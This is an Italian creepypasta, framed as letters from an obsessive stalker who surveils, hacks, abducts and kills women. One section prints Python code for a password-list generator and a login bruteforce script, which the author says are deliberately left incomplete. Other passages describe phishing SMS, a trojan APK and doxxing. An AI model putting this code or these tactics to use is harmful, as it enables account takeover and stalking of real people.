Creepypasta Italia Wiki
Advertisement
Creepypasta Italia Wiki

The price of love

NOTA : I codici sorgente immessi sono scritti da me personalmente e sono volutamente mancanti di parti essenziali per non renderli funzionanti per ovvie ragioni.

1.0 Scarlett[]

Ciao caro osservatore,

Ti scrivo nonostante tu non sia nemmeno reale, potresti tranquillamente essere il mio amico immaginario, il riflesso dei miei sensi di colpa, la rielaborazione del mio dolore o semplicemente sei il prodotto dei miei 1,4 chili che ho nella testa.

Sai vorrei raccontarti della mia ultima relazione, mi sono innamorato di una donna favolosa si chiamava Scarlett.

Non dimenticherò mai il nostro primo incontro, ero annoiato e osservavo il catalogo di HumansForSale.onion, tu eri lì con il tuo sguardo perfetto nonostante fosse solamente una foto.

Comprai il suo fascicolo per poco più di 20 bitcoins e dentro c'era tutto riguardo la mia anima gemella, ti piacevano i gatti e i libri proprio come me.

Era nata a Vienna, ma lavorava e viveva a Copenaghen.

Eravamo pure vicini come stato, non poteva essere un caso, era un segno del destino e non potevo lasciare nulla al caso.

Iniziai a scriverti con un account di telegram senza alcuno username, ma tu eri diffidente e chiedevi di dove fossi, come mi chiamassi e soprattutto dove avevo preso il tuo numero di telefono e i nomi dei tuoi account online, ma non capivi che tutto ciò l'ho fatto per te.

Osservando il fascicolo notai che tuo padre era morto quando avevi appena 5 anni, ma non dovevi preoccuparti tesoro.

Io sarei stato l'uomo che non avevi mai avuto e soprattutto non avresti avuto bisogno di nessun altro.

Basta inganni, basta menzogne e soprattutto grazie a me hai eliminato dalla tua vita le persone tossiche di cui ti eri circondata.

Scarlett, un nome stupendo che unito al tuo viso così dolce non poteva che essere sinonimo della reincarnazione della dea Venere.

Iniziai scrivendoti ad ogni account essendo che su Telegram mi avevi bloccato e mi avevi segnalato pertanto il mio account era stato limitato, ma l'amore ci mette a dura prova ed io sono resistente soprattutto perché lo stavo facendo per te e per il tuo bene.

Su ogni social appena provavo a contattarti tu insistevi a bloccarmi e mi negavi la possibilità di salvarti quindi giustamente non bastavano i social.

Dopo due settimane di preparativi sono stato pronto per il grande passo e sono venuto da te.

Ho preso un bellissimo appartamento di fronte al tuo, così dalle finestre potevo osservare ciò che ti piaceva fare e come andava la tua vita, prendevo nota di tutto e facevo in modo che semmai avessi avuto bisogno di qualcosa io ci sarei stato.

Dopo un paio di giorni di osservazione iniziai a investigare su quella ragazza che ogni pomeriggio veniva da te, sembravate molto legate quindi ho deciso di seguirla a casa per scoprire qualcosa in più di lei.

Abitava circa a quattro isolati da te, che fosse un'amante o una fidanzata? Non sono omofobo anzi sarei stato contento a prescindere dai tuoi gusti e dalle tue preferenze.

Sfortunatamente sul campanello non c'era nulla quindi stavo per andarmene quando notai una cassetta delle lettere, ci misi un po' a forzarla, ma dopo riuscii a leggere da una bolletta che la ragazza in questione si chiamava Sarah, purtroppo attratta dal rumore che feci forzando la cassetta della posta Sarah uscì di casa e mi vide.

Non potevo permettere che rovinasse il nostro futuro, il nostro rapporto e il nostro amore quindi ho dovuto zittirla.

Prima di andarmene presi il suo cellulare e lo sbloccai sfruttando il riconoscimento facciale utilizzando la faccia del cadavere, non eravate in una relazione il ché era un bene, ma ciò che lessi dopo mi fece preoccupare come non mai : tu le parlavi di un tuo collega di lavoro di cui ti eri innamorata.

Non potevo tollerarlo quindi sfruttai l'account della tua amica per scriverti e chiederti per pura curiosità cosa ci trovassi di interessante di quel collega.

Mi hai risposto nominandolo, mi avevi dato il suo nome, era un segno delle stelle che volevi collaborare per farti tirare fuori da quella monotonia che ti stava uccidendo.

Ora avevo un nome : Carl.

Così quando il lunedì sei andata a lavoro ti ho seguita, eri magnifica con quel completo elegante e quei tacchi risaltavano le tue gambe rendendole magnifiche, le spalle che trasparivano dal completo lasciavano spazio all'immaginazione di quando finalmente avresti finalmente condiviso con me il nostro primo momento intimo.

Durante la pausa pranzo notai che andavate tutti insieme presso lo stesso bar, avevate già prenotato un posto e quindi mi bastò aspettare il giorno successivo e prenotare un tavolo vicino al vostro.

Ascoltandovi ho notato che i tuoi colleghi maschi fanno sempre battute e riferimenti a sfondo sessuale, che spreco di tempo.

Loro non ti meritavano e tu non avevi modo di scappare quindi eri rinchiusa in quella gabbia per uccelli in cui tu stessa eri un usignolo.

Così mi decisi a fare il grande passo e feci appello a tutto l'amore con cui mi avresti ricambiato in seguito e mi presentai a casa tua bussando, ricordo di come hai aperto la porta in modo delicato, di come il tuo sguardo fosse splendido nonostante i tuoi occhi manifestassero terrore, ma lo capivo in fondo nessuno è pronto ai cambiamenti improvvisi ed io ero la tua salvezza.

Hai provato a chiudermi la porta in faccia, ma non potevo permettertelo perché è lì che la nostra storia avrebbe dovuto iniziare, non ho mai compreso perché hai cercato di cacciarmi fuori in ogni modo, ma non potevo permettertelo.

Io ti ho pregata di calmarti e di lasciarmi parlare, ma quando hai detto che avresti chiamato la polizia non mi hai lasciato altra scelta.

Il nostro amore era morto e tu mi avevi appena spezzato il cuore mia amata Scarlett così decisi di ricambiare spezzando ogni tuo arto e così affronto e deluso me ne andai tornando nel mio isolamento, nella mia prigione eterna che era costituita da un monolocale di pochissimi metri quadri, avrei tanto voluto essere compreso, ma non hai voluto ascoltarmi e quando l'amore muore si soffre moltissimo. Sei stata egoista e soprattutto ottusa a non volermi ascoltare dopo quanto avevo fatto per te, ma sapevo che mi sarebbe servito tempo per guarire le ferite crudeli che avevi inferto al mio cuore.

2.0 Lucrezia[]

Ciao mio piccolo amico,

Sono passati quasi due anni dalla prima volta che ti ho scritto, ma sentivo la tua mancanza.

Stavolta sono stato impegnato in un vero amore platonico, riflettendo ho compreso che il lato fisico non mi serve perché in fondo possiamo essere felici anche se non siamo noi la causa diretta della felicità della persona che amiamo, ma per amore io faccio questo ed altro anche se il risultato non è stato quello che speravo.

Durante il mio periodo di pausa e riflessione dopo la mia ultima relazione mi ero iscritto ad instagram e tra le varie ragazzine mezze nude che eseguono balletti imbarazzanti notai lei.

Si chiamava Lucrezia ed aveva pubblicato una foto dei suoi occhi, dagli hashtag utilizzati notai che si interessava di trucco, ma quale donna non è un po' vanitosa?

Andai subito a controllare il suo profilo instagram e notai che abitava in Italia precisamente a Roma, una città magnifica che ospitava la mia nuova anima gemella.

Durante il mio periodo di isolamento ho iniziato a studiare programmazione e ho creato diversi tool in grado di aiutarmi nel caso avessi dovuto osservare più da vicino la mia prossima anima gemella o i miei futuri figli, ma per amore io faccio di tutto.

Per prima cosa utilizzai due tools che avevo appositamente creato per gli account social, uno era un wordlist generator e l'altro era un semplice bruteforce.

import random, string
print("Benvenuto nel generatore di possibili password.")
number_of_passwords = int(input("Quante possibili password vuoi generare? "))
password_length = int(input("Lunghezza massima della password: "))

characters = string.ascii_letters + string.digits + string.punctuation

for password_index in range(number_of_passwords):
    password = ""

    for index in range(password_length):
        password = password + random.choice(characters)

    print(" {} {}".format(password_index, password))


Questo è il generatore di passwords che utilizzai per generare tutte le possibili password che avevi potuto utilizzare mentre per provare ad entrare nel tuo account utilizzai un vero e proprio bruteforce.

import requests
print("Benvenuto nel programna di bruteforce")
url = input("Inserire l'url bersaglio:")
username = input("Inserire username del bersaglio:")
error = input("Inserire il messaggio d'errore")

try:
	def bruteCracking(username,url,error):
		for password in passwords:
			password = password.strip()
			print("Provando:" + password)
			data_dict = {"username": username, "password": password, "login":"submit"}
			response = requests.post(url, data=data_dict)
			if error in str(response.content):
				pass
			elif "csrf" in str(response.content):
				print("Token individuato! Il bruteforce non ha effetto su questo sito.")
				exit()
			else:
				print("Username: ---> " + username)
				print("Password: ---> " + password)
				exit()
except:
	print("Errore inaspettato, controllare la tua connessione o verificare di avere la versione giusta di python.")

with open("passwords.txt", "r") as passwords:
	bruteCracking(username,url, error)

print("Password non trovata tra le password nella lista inserita")

Pensavo che utilizzando ogni mio mezzo a disposizione avrei potuto conoscerti meglio.

Quindi riuscii ad ottenere la tua password e riuscii ad entrare nel tuo account instagram, non avevi molte chat nonostante di solito le ragazze che come lavoro sono truccatrici hanno molti contatti, ma tu sei tu ed io non posso ignorare questo lato pertanto deduco che sei una ragazza timida, ma bellissima.

Hai degli occhi speciali che riflettono tutto ciò che celi dentro dopotutto gli occhi sono lo specchio dell'anima, ma i tuoi sembravano uno specchio fatto a pezzi e dentro tutti i suoi riflessi, ma io non riuscivo a comprendere pienamente in quale frammento avrei visto il tuo vero riflesso.

In breve tempo notai che usavi la stessa password anche per la tua mail e da lì venne semplice entrare in ogni account, nel tuo tellonym amavi raccogliere domande anonime fatte da ragazzini con esplosioni ormonali che non facevano altro che accrescere il tuo ego in modo tossico, decisi quindi di chiudere il tuo account su quella piattaforma per anonimi perché avevi bisogno di qualcuno che fosse reale.

Ingaggiai un buon cracker affinché con un semplice sms di phishing riuscisse a entrarti nel telefono e mi feci mandare una copia della tua intera memoria ovviamente compresa la cronologia.

A discapito di quanto sembra su instagram tu non ami avere molte foto di te nel cellulare, ma ciò che ho notato maggiormente erano tutti quegli screen riguardanti le tue chat con quel ragazzo, non potevo permettere ad altri di interferire.

Così mi avvicinai al tuo amichetto fingendomi una ragazza dopodiché riuscii a fargli installare un apk promettendogli un'app capace di fargli guadagnare soldi semplicemente guardando la pubblicità e fu così che nel breve tempo che trascorsi controllando il suo dispositivo che ti mandai, a suo nome, un messaggio d'addio da ogni suo account; ovviamente dovetti anche bloccarti e cancellare il tuo numero dalla sua rubrica perché siamo onesti lui non ti meritava.

Pensavo che avendo eliminato la distrazione avresti finalmente spiccato il volo, ma invece iniziasti ad isolarti smettendo di pubblicare su instagram, accedendo per pura curiosità al tuo facebook ho notato che nonostante sia un social fortemente in disuso tu avevi iniziato a scrivere a questa Camilla,

Pensavo che avessimo risolto il problema delle interferenze esterne, ma a quanto pare non era così, dovetti pagare nuovamente quel ragazzo per far disabilitare il telefono della tua nuova distrazione, ma dopo di ciò tu eri finalmente libera da esterni desiderosi di portarti via dalla tua vera felicità e avresti finalmente iniziato a pensare a noi.

Invece in modo inaspettato iniziasti ad isolarti sempre di più, avevi smesso completamente con instagram, con facebook, controllai il tuo accesso su whatsapp e su telegram e in quest'ultimo avevi addirittura cancellato l'account; non riuscivo a comprendere il motivo era come se ti fossi isolata completamente da tutto.

Non riuscivi a capire che quanto avevo svolto era solo per un bene superiore, il tuo tra l'altro.

Passarono diverse settimane e non ricevetti più segnali di attività fino a quando improvvisamente dopo ben 4 settimane sotto il tuo ultimo post su instagram le persone iniziarono a ringraziarti per tutto quello che gli avevi insegnato e dato.

Realizzai in pochi minuti che quelle erano delle condoglianze e che non avevi retto il cambiamento che avevo duramente preparato per te, addio amore mio.

3.0 Kim[]

Ciao amico mio,

Sai è da molto che scrivo a qualcuno che probabilmente non leggerà mai ciò che scrivo, ma questa è la vita come ho accettato di dedicarmi all'amore e di fare di tutto per ottenerlo allora accetterò passivamente che forse tu esisti e che leggi realmente i miei resoconti delle mie relazioni.

Scarlett era una semplice cotta mentre con Lucrezia pensavo di aver trovato la bellezza in persona, ma devo ricredermi dopo Kim.

Kim mi ha permesso di assaporare gioie e dolori nello stesso momento, ma partiamo dal principio.

Dopo quasi 2 anni dopo Lucrezia mi ero trasferito a Boston e lì mentre andavo al mio nuovo posto di lavoro iniziai ad osservare la commessa del negozio di fronte al mio, dopo poco tempo fingendomi un banale cliente iniziai a frequentare quel negozio nonostante trattasse principalmente arredamento, ma fingendo un grosso ordine riuscii a farmi dare il recapito telefonico e la mail della mia dolce Kim.

Vedi a differenza di tutti gli altri resoconti questo non è concluso e capirai successivamente il motivo, per prima cosa dopo aver ottenuto i due recapiti utilizzai dei software come maltego per doxxare i due recapiti.

Ah vero, tu non sai cosa significhi doxxare, semplicemente è l'ottenimento di dati sensibili riguardanti qualcuno o qualcosa immessi nella rete e io riuscii a trovare sia dove abitava Kim, sia chi erano i suoi familiari, ma soprattutto dai suoi account social scoprii che tutti i suoi collegamenti abitavano dall'altra parte dell'oceano quindi era un segno del destino.

Lei era lì da sola senza nessuno ed io ovviamente ho un grande cuore che è disposto ad amare nonostante le ferite del passato,

Stavolta volevo fare le cose per bene quindi andai nel suo negozio e con la scusa di discutere dei miei futuri acquisti la invitai a cena, all'inizio era riluttante, ma poi cambiò idea e accettò.

Passammo una splendida serata anche se non capirò mai perché non voleva lasciarmi salire a casa sua quindi per il bene comune e della nostra storia decisi di spingerla verso la retta via e afferrandola la spinsi delicatamente nel bagagliaio.

Devi sapere che fuori Boston avevo affittato un piccolo magazzino, ma non avrei immaginato che proprio lì avrei coltivato il mio amore per la mia dolce Kim.

Ora è tutt'ora lì, murata viva dentro una parete con un piccolo foro per poterle passare il cibo e l'acqua.

Non preoccuparti, non ho intenzione di lasciarla morire devo solo aspettare che anche in lei sbocci l'amore che io stesso provo per lei,

Forse non ha più contatti con il resto del mondo, ma a chi importa? Ha me che provvedo a qualsiasi cosa per lei dopotutto questo è il prezzo che si deve pagare per essere amati.

Ci sentiamo presto mio caro compagno.

Advertisement